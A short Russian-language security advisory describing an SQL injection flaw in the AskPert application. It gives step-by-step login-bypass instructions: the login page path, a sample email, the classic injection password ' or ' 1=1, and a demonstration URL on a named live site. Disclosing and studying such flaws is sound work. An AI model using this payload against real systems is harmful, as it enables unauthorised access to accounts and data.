Программа: AskPert

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных. Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольные SQL команды в базе данных
приложения.

Эксплоит:

Введите ask/index.php?section=user&action=login

Используйте следующую информацию для обхода входа в систему.

Почтовый адрес, например, такой как:
Starhack@TR-ShaRk.OrG

В качестве пароля используйте ‘ или ‘ 1=1

Демонстрация:

http://www.w3matter.com/ask/index.php?section=user&action=login



Оставить мнение